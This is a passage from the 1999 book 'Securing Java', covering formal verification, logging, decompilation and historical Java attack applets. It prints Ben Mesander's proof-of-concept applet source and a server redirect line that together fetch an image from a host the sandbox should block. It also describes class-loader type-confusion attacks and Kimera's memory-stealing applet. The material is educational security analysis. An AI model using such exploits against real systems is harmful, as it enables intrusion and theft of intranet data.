Can Java Be Proven Correct? Our previous discussion of ASTs and the current byte code representation leads directly to the next topic: formal verification. That's because any questions of provability are compounded by having two languages with separate semantics to understand (Java source code and Java byte code). Formal verification involves proving, in much the same way that a theorem is proven in mathematics, that a program does what it is supposed to do or that a programming language has certain properties such as type safety. This is a laborious process, to say the least. There are many sorts of formal analysis Java could undergo. The security model itself (if formalized) could be analyzed. The Java source language could be formalized in a specification, then shown to be valid. The same thing could be done for Java byte code. In addition, a better-specified formal relationship between Java byte code and Java source code could be worked out. The Java VM could also be formally verified. Computational Logic, Inc. (CLI), Schlumberger, and JavaSoft collaborated in 1997 to create a formal model of a portion of the JVM. The model was built in Common LISP and provided some formal analysis capabilities. The model performs extensive runtime type-safety checks, something that the standard VM does not do (the standard VM relies on the Verifier to perform many type-safety checks instead). CLI focused on Card Java (see Chapter 8, "Java Card Security: How Smart Cards and Java Mix"). It appears that CLI is not planning further formal analysis work. For more information see: www.cli.com/software/djvm/index.html.
Formalizing the Security Model To this day, Java still has no formal security model. The complete security policy has never been specified at a sufficiently high level for current versions of the language. As a group of security researchers once said, "A program that has not been specified cannot be incorrect; it can only be surprising" [Young, et al.,
1995]. It is not possible to determine just what secure means without a creating a formalized policy. Furthermore, a particular implementation of a nonexistent policy cannot be properly verified. Some progress was made toward this goal in a report commissioned by Sun back in 1996. The report, entitled Security Reference Model for JDK 1.0.2, explained (in informal English) Java's implicit security policy (at least for the base security sandbox described in Chapter 2) [Erdos, et al., 1996]. The SRM is available through www.javasoft.com/security/SRM.html. Creating the SRM was a useful exercise; unfortunately, any utility provided by the SRM was caught in the Internet-time cross fire. The SRM is completely out of date. Given the rigorous security demands of electronic commerce, documents like the SRM should be demanded by organizations using consumerware in their security-critical systems. Progress on the formalization front has also been made by programming language researchers (see, for example, [Drossopoulou and Eisenbach, 1998; Stata and Abadi, 1998]). Work on the soundness of Java continues.
Analyzing Java Source The Java source language is powerful and includes a whole host of features. Only recently has any sort of specification of the language appeared. Given a complete specification of Java source semantics, a formal analysis can be completed. This work is currently under way.
Analyzing Byte Code Java byte code plays a critical role in the way Java works. Some progress has been made with regard to formalizing byte code semantics with the release of a specification for the VM [Sun Microsystems, 1996b] (also see [Venners, 1998]). Given a sufficiently detailed specification, it is possible to begin work on proving that the VM and Verifier systems are implemented properly. Preliminary work on testing Verifier implementations has been done by the Kimera Project at the University of Washington (for more on the Kimera effort, see Verifying the Verifier in Chapter 5).
Comparing Byte Code and Java Source Showing how Java byte code behaves in relation to Java source code was impossible without a semantics for both. Now that we have two specifications, we can determine whether or not byte code is more powerful than Java source code. Are there things that you can do with byte code that you can't do through Java source? Unfortunately, the answer is yes. The Princeton team has discovered at least one instance in which it is possible to create byte code for an activity that is not allowed when going through a Java compiler. Other efforts to probe byte code functionality include the University of Washington's Kimera Project and Mark LaDue's malicious applets. Byte code banditry is as potent an approach today as it was in 1996.
Analyzing the Java VM
One problem affecting formal analysis of Java implementations is the size of the Java system. With tens of thousands of lines of code, Java raises critical assurance flags. Making certain that each of these lines of code does not introduce subtle vulnerabilities requires significant security analysis. Only a bit of this sort of analysis has been performed. It is beyond today's technical capability to formally verify any piece of code in excess of a few thousand lines. This means that because of its size, Java is not amenable to formal proof of correctness. However, it may well be worth the effort to formally prove some aspects of Java's specification correct. The first targets should probably be the core of the VM and other security-critical pieces of the JDK, such as Class Loaders and Security Managers.
Software Engineering Many bugs have been found in various sections of the Java code. It is unlikely that security-critical code is bug free. Security vulnerabilities are often the result of buggy software. It is difficult enough to deal with bugs in standard code; bugs in security-critical code are much more serious. This problem requires sound software engineering. That Java programs will be built out of prefabricated components will make any security bugs much more serious. Many different sites may end up using such a component that turns out to have a security problem. Not only will people liberally borrow securityimpaired code snippets from each other, they will also begin to reuse entire classes of flawed code. Such code flaws will be increasingly difficult to isolate. Perhaps software engineering will develop a new approach that avoids such potential pitfalls. In any case, Java will continue to have an effect on what the future deems state of the art.
To Log or Not to Log The next concern involves something very simple: keeping track of what Java does on your machine. One universal capability that computer security experts rely on, no matter what the platform involved, is logging. Often, the only way to reconstruct an intrusion is to carefully and painstakingly read the associated log files. Of course, such detective work is not possible in an environment lacking log files. Logs provide several benefits: ● ● ● ●
They allow the victim to determine what damage was done. They provide clues about how to prevent similar attacks. They provide raw data for many intrusion detection approaches. They provide evidence for possible legal or administrative proceedings against the perpetrator.
Java still has no logging capability (although as we shall see later in this chapter, a number of add-on products provide this). It is impossible to track which applets were loaded and run, as well as what those applets might have done. The most fundamental things that should be logged are file system and network access. Simply capturing these data would give system and security managers a chance to see what sorts of access were involved in an intrusion. File system access logging alone would help system managers protect files that Java crackers were accessing in their break-in attempts. It would also be good to capture applet byte code for analysis in case an applet ends up doing something hostile. It is often easier to recover from an intrusion if you know what caused it and what happened during the event. Chapter 4 examines how an applet can delay its processing until a later time. Given that applets can do this, logging becomes even more important. An especially crafty hostile applet can wait until some other Web site becomes the main suspect before doing its dirty work. It won't be surprising if the most hostile applets turn out to be the craftiest. Tracking byte code would give system managers the ability to at least verify the function of each applet that may have been involved in an attack. One of the lessons emphasized in the book Takedown is that without a log file, it is impossible to prosecute computer criminals [Shimomura and Markoff, 1996]. Without a log file, you have little legal recourse in the event of a system break-in. If your site is hit by an attack applet today, erasing critical information, you can't do anything about it, even if you know the culprit. Applet logging is an essential security feature that should be made available immediately.
Who Do You Trust? Early versions of Java were built without technological help for making privilege decisions. Since 1996, things have changed significantly; so much so that this book required a complete revision. Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," discusses the impact of the new privilege system defined by Java 2 on the Java security situation. Not only is the VM itself infused with the capability to create and enforce privilege policies, but the very primitives out of which the new system is constructed have been made available to Java developers. Java now includes support for standard cryptographic algorithms, including SHA, MD5, DES (at least in North America), and SSL. Now what is needed is tools to create and manage security policies that include privilege decisions. Java 2 offers fine-grained access control, but it does not offer a compelling tool for creating, testing, and managing policy (see Appendix C, "How to Sign Java Code"). Lack of such management tools is likely to slow the adoption of Java 2 functionality in the enterprise.
Scattershot Security One of the most common criticisms of early Java security architecture centered on how Java spreads security functionality throughout the code. Unfortunately, the problem of scattershot security has not gone away. Research at Princeton shows that security boundaries (between trusted system code and less-trusted code) are crossed up to 30,000 times per second in a typical applet [Wallach, et al., 1997]. Other evidence can be seen by the effort that Sun undertook when changing the JDK 1.2 API from the beginPrivileged()/endPrivileged() syntax of beta3 to the doPrivileged() syntax of beta4. Over 250 changes were required in the Sun reference VM implementation to make the change. Reliance on a scattershot architecture means that security depends on many different parts working together properly. There is no centralized security system; no single source for security approval. Java implements security features through dynamic type checking, byte code verification, class-loading restrictions, and runtime checks performed by the Access Controller. Each resides in a different part of the Java environment. Such an architecture depends on too many unrelated functions. If all of the securitycritical functions were collected together in one place, that aggregate code could be more easily verified and analyzed. That simple step would satisfy some concerns held by security experts. Some of Java's security policies are dependent on the Java language itself. This is fine if all Java byte code must be created by a Java compiler, but what guarantees does anyone have that byte code has been generated by a Java compiler that plays by the rules? There are none, nor should there ever be. There are compilers now in existence that turn Ada and C code into Java byte code. To take such third-party bytecode development efforts away by legislating a particular compiler would go against the spirit of the language. The problem is that the Virtual Machine interpreting Java byte code may allow more functionality than it should. More explicitly, there may be more functionality built in to the byte code than security would dictate (see Figure 6.1). If the Java compiler never creates byte code capable of exploiting such features of the VM, then the architecture would seem to remain safe. Since no one has control over who and what creates Java byte code, system managers should not rely on such a false hope. Someone could write a compiler able to create byte code that seems valid to the VM but breaks rules ordinarily enforced by the Java compiler. Or, someone could create byte code through any number of other means; for example, direct creation with an editor, or creation with a Java byte code assembler (like Jasmin, see www.isbe.ch/ ~wwwinfo/sc/cb/tex/jasmin/guide.html).
Figure 6.1 If Java byte code is more powerful than Java source code, then the extra functionality in byte code is dangerous. There is some evidence that this is the case.
One somewhat inefficient (but interesting) solution to this problem has been suggested by Andrew Appel of Princeton. He suggests checking byte code by first decompiling it to Java source, then recompiling the source to byte code. If a compiler you trust does not complain during recompilation, then the original byte code is equivalent to some Java source program, and hence must obey the rules of the Java language. This process is slow, but in certain security-critical instances it pays to be paranoid.
Decompiling Java Byte Code Although decompilation is not a traditional concern of security experts, it does have some interesting twists in Java. It turns out that one of the side effects of Java byte code's clarity is that byte code is very easy to decompile. This means that given a .class file, it is possible to automatically reconstruct reasonable source code. (Of course, it is also possible to decompile x86 object code as well as any other executable code. Java is not alone in its exposure to decompilation.) The JDK comes with a weak decompiler as one of its standard tools, but much better decompilers are available on the Web. In the early days, the best was the Mocha decompiler, which has since become obsolete. A good decompiler to consider now is the SourceAgain Decompiler from Ahpah software. Decompilation is relevant to security for a couple of reasons. The first reason is that businesses interested in using Java as a development language will need to consider the existence of decompilers before they distribute Java .class files. It probably won't be possible to sell something if making knock-offs turns out to be incredibly easy. Fortunately, some companies now distribute Java source code obfuscators (watch out for snake oil solutions in this domain, however). The end result of obfuscation is that although a .class file will decompile into valid Java, that valid Java won't be very readable by humans. One caveat: Obfuscation certainly makes decompilation more difficult, but it won't protect your code against a determined adversary.
Even if your code is subject to decompilation, you can still get some protection by copyrighting the code and legally defending the copyright in court if necessary. This is not an ideal solution, but it's better than nothing. A closely related issue involves protecting secret or otherwise sensitive information in a piece of mobile code, such as cryptographic keys. A good guideline if you are developing mobile code in Java is not to include any secrets in the code. An applet that carries a password or a crypto key in its code is amenable to hacking. Anyone who runs such code can get access to its secrets. More on this issue can be found in Chapter 7, "Java Security Guidelines: Developing and Using Java More Securely." There is a third security concern related to decompilation. Given a piece of Java source code obtained by decompilation, a cracker can better analyze the program for weaknesses that could be exploited to break it. This would allow an attacker to attack a Java program more intelligently. Applications like Netscape's Java VM are susceptible to this sort of source-related attack. Crackers like to have code to poke around with. Furthermore, an attacker could build a very realistic Trojan Horse program that looks almost exactly like the original. Like its ancient counterpart, a modern Trojan Horse is a program that appears to be one thing at one level, but turns out to breach security at another.
Trusted Dialogs and Meters In an earlier chapter, we raised the idea of providing trusted dialog boxes for critical actions like file I/O, or critical measurements such as CPU cycles used. These dialogs would provide an important monitoring and feedback mechanism to Java users. Providing a trusted set of dialogs (that cannot be spoofed) for things like file access seems like a good idea. However, with any such user interface, one of the key goals must be to minimize user involvement in security. Most users don't read their dialog boxes before they click OK (recall the dancing pigs problem). Sophisticated users should probably have some control over their security policies, but the less intrusive this control is, the better. Management issues like these are taking on more importance as Java security evolves from the base sandbox into the Java 2 model in which security policy plays such a central role. Centralized management is especially appealing at the enterprise level, and much work remains to be done to develop policy management tools and techniques. Far from being in the way, a set of resource access indicators that cannot be forged would be a welcome addition to Java from nearly every user's perspective. This set of instruments could allow a user to track system resources such as CPU cycles, or microphone use. Some third-party vendors offer monitoring capabilities like the ones mentioned here. What is not yet clear is how well protected against spoofing these meters are. A meter that can be made to display false system information on behalf of an attack applet is potentially more dangerous than having no meter at all.
Management Tools Java 2 is not going to be adopted overnight; it is a complicated system, and utilizing it to its full potential will be a complicated undertaking. As we have said before, we think it is likely that signed mobile code and complex security policy will first be adopted for the intranet. Only after organizations and enterprises have their ducks in a row internally will they begin to experiment with complex security policies that make use of the Internet/Web. A set of tools for creating and managing policy, especially enterprise-wide, would go a long way toward easing the adoption of Java 2. The existing tools being distributed with the JDK are rudimentary at best, and hard problems like identity/certificate management have many remaining open issues. (See Appendix C for details on how to use some of the existing code signing tools.) The problem of policy management has existed for years in the security community. One characteristic of the problem is that it does not scale well. A tool that may be adequate to managing policy for one browser will probably not work well across a network of hundreds or thousands of machines. This problem crops up in all aspects of security. One common way to get a handle on it is to create a choke point at the perimeter (for example, at the firewall) and instantiate site-wide policy there. Security vendors have been frantically working on policy-management tools for some time, but work remains to be done. Ideally, a site-wide policy could be managed by a powerful tool and would include mobile code policy. Many security pundits anticipated that by now, a solid public key infrastructure (PKI) would have been put in place; unfortunately, that is not the case. Java 2 would be much easier to adopt if the PKI were already there. As it now stands, delays in PKI placement are likely to hamper systems that rely heavily on codesigning. After all, if you have no idea who is behind an identity, how can you possibly trust them? It is not clear at this point why any particular certificate authority deserves your trust.
Java Antidotes As can be seen from the laundry list of high-level concerns, Java security can still be improved in many ways. Some of the most effective antidotes to Java security problems involve addressing the criticisms raised here.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Previous Page
Securing Java: Improvements, Solutions, and Snake Oil
Next Page
Now that we've covered hostile applets, let's turn to the positive side and talk about what can be done to improve Java's security. Of course, security can always be improved by fixing specific bugs, as Sun Microsystems, Netscape, and Microsoft have been doing. Again, removing a needle from a haystack is easy once you've been stuck by it. This chapter focuses on more global issues surrounding the design of Java. What sorts of high-level antidotes are there to some of Java's security concerns? This chapter has two major goals. The first goal is to discuss high-level concerns about Java and to make some suggestions about how they could be addressed. Many of these suggestions carry over from the original edition of this book. Since 1996, only a handful of our original suggestions have been adopted. At the risk of being redundant, we raise them again. The high-level concerns include programming language issues, formal analysis, applet logging, trust models, the distributed nature of the security model, implementation versus specification, decompilation, trusted dialogs, and policy management. Fixing the way that Java does some of these things will certainly improve security. The second goal is to discuss a number of Java security add-on products that have appeared on the market. A number of companies have introduced add-on products that are meant to improve Java security by mitigating known risks. Vendors include Finjan, Digitivity (now Citrix), Security7, and others. We take a quick look at each of these products and consider their goals in light of objective reality.
Chapter Six Sections
1. 2. 3. 4. 5. 6.
Improving the Platform Writing Safer Code: A Defensive Stance Third-Party Solutions or Snake Oil? Risks That Third-Party Vendors Can Address Risks That Third-Party Vendors Can't Address Assess Your Risks
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 20 -- What These Problems Teach Us The designers of Java tried to ensure that applets could not misbehave. Although they often claim success (with apologies to Mr. Clemens) claims about Java's security have been greatly exaggerated. Lately, the security message emanating from the major vendors has tended to emphasize the idea of managing risks. That's good. We live with risks every day, and there is no reason we can't live with mobile code risks, especially if we take on the risks with our eyes open and some forethought about possible consequences. All implementations of Java have had some rather serious security flaws. Even "mature" implementations including Java 2 are not perfect. All known attacks have been detailed in this chapter. So the question is what to do as we face these risks. Turning Java off is certainly one solution, but not a very satisfying one. Java has lots to offer, and not using it would probably be a poor decision in the long run. The new Java 2 security model, with its emphasis on policy, may help make Java risks easier to manage. The trick is setting up a sound policy that makes sense for your organization. Each of the security problems that we discussed in this chapter can be implemented as an attack applet. In fact, the Princeton team regularly creates attack applets in the lab to test the limits of Java's vulnerabilities.4 Although rumor has it that attack applets based on the DNS bug and the Princeton Class Loader attack have appeared on underground Web sites, there is no convincing evidence that such attack applets have ever been used to crack a system on the Net. Nonetheless, the main reason attack applets need to be taken very seriously is that the end result of a successful attack is full system penetration; in other words, attack applets are capable of aiding a cracker in taking over your machine. Once you no longer "own" your machine, a cracker can install a virus, erase your hard disk, place Trojan Horses and logic bombs, or maybe just spy on you and steal your credit card information, bank account number, business plans, or personal correspondence. Java brings the formidable power of mobile code to the Web. Trading security for this power is a tough pill to swallow, but a pill that's probably worth ingesting. Users want audio/visual conferencing without
cross-network eavesdropping. Users want loosely coupled computation for things like factoring without cycle theft and denial of service. Users want games without Trojan Horses. Users want save and restore for applet-based preferences without having their valuable files stolen. Being security conscious, users can probably have what they want, without getting anything that they don't need.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 19 -- Beat the System In July 1998, Dirk Balfanz, Drew Dean, Edward Felten, and Dan Wallach of Princeton's Secure Internet Programming team found another Java security flaw that allows a malicious applet to disable all security controls in Netscape Navigator 4.0x. After disabling the security controls, the applet can do whatever it likes on the victim's machine, including arbitrarily reading, modifying, or deleting files. As usual, the Princeton team implemented a demonstration applet that deletes a file. The hole that the Princeton Team discovered was actually present in all VM's, but was only exploitable in Netscape 4.0x. This serves to emphasize the difference between holes and exploits discussed earlier in the chapter (see page 142). Figure 5.7 illustrates the relationship between a security hole and an attack applet that exploits the hole.
Figure 5.7 Security holes and exploits. An attack applet is created to exploit one or more security holes in order to completely compromise security.
This attack pieced together several security-related flaws. The first flaw, discovered by Mark LaDue, is that the Netscape 4.0x Security Manager does not prevent untrusted applets from creating subclasses of
Netscape's AppletClassLoader class. This allows an applet to create a Class Loader. The second flaw, discovered by the Princeton team, is that the class loader mechanism, as of JDK 1.2beta3 and Netscape 4.0x (and, apparently, Internet Explorer 4.01), sometimes allows a malicious Class Loader to override the definitions of built-in classes. Specifically, a Class Loader can use its defineClass() method to define classes that have the same name as any built-in class, provided that the built-in class being overridden has not yet been loaded into the Class Loader's namespace. Since the correct operation of the Java VM depends in part on the correct behavior of built-in classes like java.lang.Class, java.lang.Object, and java.lang.Exception, a Class Loader that can override the definitions of built-in classes can change the rules of the Java VM. The third flaw is a subtle bug in the Verifier that opens a window of vulnerability for the class-overriding trick. The details of this third flaw are a bit too sensitive to publish here. Suffice it to say that the Verifier assumes that only certain types of objects can appear on the stack in some special situations, and that classoverriding allows an attacker to violate this assumption. The combination of these three flaws allows an attacker to create type confusion, which leads to a fullblown security breach as usual.
Class Loading Take Four One instructive thing about this attack is the role of class loaders. Several previous attacks have exploited class loader problems, and this attack shows that the class loader design was still not right, even after several iterations. Indeed, the problem of designing a correct class loader API is a subject of research by Drew Dean at Princeton [Dean 1997], leading to a major portion of Dean's Ph.D. thesis. The problems with class loaders are perhaps the best counter-argument to those who say that Java's security problems have been superficial implementation bugs. Fixing these problems is hard enough to merit a Ph.D. thesis! This flaw is fixed in Netscape Navigator 4.5.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 18 -- Look Over There In August of 1997, Ben Mesander, a professional programmer and consultant from Creative Concepts in Boulder, Colorado, uncovered a security hole that allowed untrusted Java applets the ability to make network connections to arbitrary locations. This flaw affected browsers with VMs coded to the JDK 1.0.2 specification. According to the JDK 1.0.2 security model, applets are not allowed to make network connections to any host other than the Web server from which they come. Three browsers-HotJava, Netscape, and MSIE-were all susceptible to the problem (at least with some proxy configurations, as we explain later). To demonstrate the flaw, which was most apparent in the MSIE implementation of Java, Mesander wrote a simple applet that was able to load a graphic from www.microsoft.com even though the applet was not hosted from that server. The ability to open arbitrary connections to other servers is distressing for several reasons. The first is that such a connection provides a channel for indirect attacks. That is, a bad guy can cause your browser to run an attack against another server, making your machine take the blame. Another is that information from your machine may be siphoned off to another site. A third is that some attack code could be fetched from another location, leaving the true culprit applet in a less-suspicious situation should a successful attack be carried out against your machine. Finally, and most realistically in terms of the example we will show later, the attack applet is able to download an image from any Web server, even those servers behind firewalls. If you have images on your intranet that should not be seen by people outside your organization (such as sales data with sensitive pricing information), the seriousness of the attack is apparent. In any case, it is clear that Mesander's applet was able to do something that should not be allowed. The applet itself is shown as Listing 5.1. Mesander serves up this "test applet" as an example on his Demo of Browser Security Hole page at neurosis.hungry.com/~ben/. The applet attempts to load a graphic from a disallowed site (Microsoft's Web site). The applet is able to determine its level of success and display a message relating to the security of your browser.
Listing 5.1 Ben Mesander's applet WhereDoYouWantToGoToday fetches an image from a disallowed location. //
[email protected] import java.applet.*; import java.awt.*; import java.net.*; class WhereDoYouWantToGoToday extends Canvas { Image image = null; WhereDoYouWantToGoToday (Image image) { super (); this.image = image; } public void paint (Graphics g) { g.drawImage (image, 0, 0, this); } public Dimension preferredSize () { return new Dimension (image.getWidth (this), image.getHeight (this)); } public Dimension minimumSize () { return preferredSize (); } } public class example0 extends Applet { private Button b; public void init () { createUI (); } private void createUI () { setLayout (new BorderLayout ());
b = new Button ("Go!"); add ("West", b); } public boolean action (Event evt, Object arg) { if (evt.target.equals (b)) { try { Image i = getImage (new URL (getDocumentBase (), "cgi-bin/redirect?where=" + URLencode ("www.microsoft.com/library/images/gifs/ homepage/tagline.gif"))); MediaTracker tracker = new MediaTracker (this); tracker.addImage (i, 0); tracker.waitForID (0); if (i.getWidth (this) == -1) add ("Center", new TextField ("Browser did not get exception, but image did not load")); else { add ("Center", new WhereDoYouWantToGoToday (i)); add ("East", new TextField ("Your browser is not secure.")); } validate (); } catch (Exception e) { add ("Center", new TextField ("Exception while fetching image:" + e)); validate (); } return true; } return super.action (evt, arg); } private static String URLencode (String s) { int i; StringBuffer b = new StringBuffer (); for (i=0; i < s.length () ; ++i) { b.append (URLencode_helper ((char) (s.charAt (i) & 0xff))); }
return b.toString (); } private static String URLencode_helper (char c) { if (c %lt; 16) { return "%0" + Integer.toString (c, 16); } else if ((c < 32) || (c > 127) || (" +&=%/~#".indexOf (c) >= 0)) { return "%" + Integer.toString (c, 16); } else { return String.valueOf (c); } } }
The applet works in concert with an HTTP redirect call that the browser being attacked follows to wherever it leads. Most of the dirty work takes place in the line: Image i = getImage (new URL (getDocumentBase (), "cgibin/redirect?where=" + URLencode ("www.microsoft.com/ library/images/gifs/homepage/tagline.gif"))); Having your Web server implement the redirect command is very simple. With the Microsoft IIS server, the code is as simple as: Response.Redirect("http://" & Request.QueryString("where")). This applet demonstrated flaws in the Java implementations of several browsers. In particular, results before the browsers were patched showed the following vulnerabilities: ●
●
●
MSIE browsers on all versions of Windows had a serious bug, which Microsoft took very seriously and released a patch for within several days of the bug's discovery. Netscape browsers were susceptible only if they were set up to use an HTTP proxy server. In particular, proxies set up to work outside the firewall caused big problems. Netscape fixed the bug in later releases of their browser. The HotJava browser allowed classes to be loaded via redirects, but did not allow images to be loaded this way.
It is important to emphasize that this is a very clear example of an implementation bug and not a design problem. Java's design at the time was such that redirects were rendered impotent as an attack mechanism. However, all the vendors (including Sun's HotJava team) did not properly implement the design.
Another important point is that the attacker must know the URL of the image or class file that is being indirectly fetched. Sometimes, getting this information is not possible. Other times, standardized naming conventions constrain the space of possible names enough that a good guess works. A good attack strategy would be to combine this exploit with a standard social engineering attack that is used to determine the name of the image file or class file to steal.
Last, But Not Least Mesander's redirect exploit was the last Java-related problem discovered in JDK 1.0.2 and JDK 1.1. In fact, Java experienced a calm period of several months before the next serious hole was discovered in July of 1998. The timing of these flaws supports the observations that discovery of holes tends to be clustered around major releases and that eventually a majority of the holes are found and fixed.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 17 -- The Vacuum Bug In June of 1997, the Kimera Project team uncovered another security hole in JDK 1.1.2 and the HotJava browser. Like the previous 24 flaws discovered, the new security hole had at its core a type-safety flaw in the Verifier. Prompted into further action by Sun's response to the first announcement, the Kimera Project team decided to create a complete exploit based on the new flaw. That was one way to emphasize that typesafety problems should always be taken seriously! The flaw itself existed only in JDK 1.1.1 and JDK 1.1.2 and was never present in either of the major browsers. By itself, the flaw manifests itself as a VM/browser crash (the browser being HotJava). That is, an applet that passes the Verifier with flying colors would end up crashing the VM when it actually ran. The crash is caused when the applet directs the browser to access inaccessible memory. Using a PC debugger (MSDEV), Kimera team members were able to determine which instruction was causing the browser to crash. With this information in hand, it was possible to cause the browser to jump to a legitimate address and start reading arbitrary memory ranges. In a strings-like move, the malicious code directed an ASCII text version of the targeted memory range back to a collection server. The attack applet created by Kimera exploited the type-safety problem to carry out this attack. The most pernicious aspect of the attack was the applet's ability to determine sensitive information about the user from the browser's memory space, including configuration settings, private crypto keys, name, email address, browser history, cache contents, etc.
Why the Flaw Was Exploited
Other than its ability to steal sensitive data, the main purpose of the attack applet was to demonstrate that what Sun had called "less serious" type-safety problems could be easily turned into full-fledged attacks. Java has at its heart a language-based security model. Such models depend completely on the type system to provide security guarantees.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 16 -- Verifying the Verifier As Chapter 2 describes, one of the essential pieces of the Java security model is the Verifier, which is responsible for checking the integrity of a class file and its byte code. Each VM, including the VM in your browser, has its own version of the Verifier. Thus the Verifier acts as a kind of independent verification mechanism to double-check the integrity of mobile Java that arrives from unknown parts. The University of Washington's Kimera Project, led by Professor Brian Bershad, implemented a cleanroom Verifier as part of a larger mobile code architecture experiment. The main idea behind the Kimera Project is to centralize Verification of byte code instead of having a Verifier running on each client. Their aims in creating a Verifier were to make it small, simple, and able to work independently. The discussion here is distilled from extensive Kimera Web documentation, which can be found at kimera.cs.washington.edu. After creating their Verifier, the Kimera Project team wanted to test it to make sure it performed in a secure and robust manner. The question was, how to do this? The answer to that question led to an empirical demonstration that the Kimera Verifier was safer than many commercial Verifiers then in widespread use. Most commercial Verifiers perform security checks in a series of stages that are distributed throughout the VM architecture. In particular, Chapter 2 describes how verification is traditionally broken into static and runtime processes. By contrast, the Kimera Verifier packages a complete verification system as one single component. An added bonus to the Kimera Verifier is the inclusion of a number of safety axioms distilled by the Kimera Project from the Java VM specification. This has the advantage of allowing the Kimera Verifier to be checked for correctness in a more thorough manner than the code for commercial Verifiers. The Kimera Verifier aligns closely with class file verification as described in the VM specification. That
means the process of verification is logically divided into four stages (see Chapter 2 for more on these stages): ● ● ● ●
Verification of class file consistency and structural soundness Verification of instruction boundaries and safety of branches Data flow analysis that verifies that operands preserve type-safety rules Verification that the class, along with the rest of the VM, does not break global type-safety rules or interface restrictions
In order to test their Verifier, the Kimera Project team created a mutation testing system. The end product of the approach is a test suite that includes millions of tests. The tests, millions of legal and illegal byte code patterns, were created by applying a set of simple mutation rules to a small number of primitive test cases. Without access to an oracle (the lack of which is the traditional Achilles' Heel of testing), there is no way to say whether behavior of the Verifier on any given test is correct or incorrect. One way around this is to submit the tests to a number of different Verifiers and see what happens. According to this paradigm, whenever results from a number of distinct Verifiers disagree, further investigation into the cause of the disagreement is warranted. The obvious problem with this approach is that if all Verifiers perform equally incorrectly on a test case, nothing suspicious will be observed, and all Verifiers will be incorrectly thought to have done the right thing. Regardless of that serious flaw, the Kimera test suite was able to identify a large number of errors in commercial Verifiers, which led to correction of the Kimera Verifier throughout its testing. The Kimera testing paradigm has much in common with N-version programming, in which N distinct versions of a piece of software are run simultaneously and a vote determines the final result. (For more on N-version programming see [Voas and McGraw, 1998].) We believe Kimera's testing methodology is a glimpse at the future of testing. Given the vast computational resources of today, there is no reason not to automate testing to a much greater extent than was feasible just a few years ago. Traditional metrics, such as test coverage, can be used to gauge the efficacy of such automated testing.
Flaws in the Verifier In April of 1997, the Kimera Project announced the discovery of 24 flaws in Sun's Verifier implementations and 17 flaws in Microsoft's Internet Explorer. Because Netscape's Verifier is very closely based on the one in Sun's JDK, it is safe to assume that most of the 24 flaws in Sun's Verifier exist in Netscape's as well (in fact, testing confirmed this). As we detail next, the flaws can be divided into several categories: security holes, weaknesses, and ambiguities.
Flaws in Sun's JDK The Sun flaws were found in the Verifiers included in JDK 1.0.2 and JDK 1.1.1. JDK 1.1.1 contained only
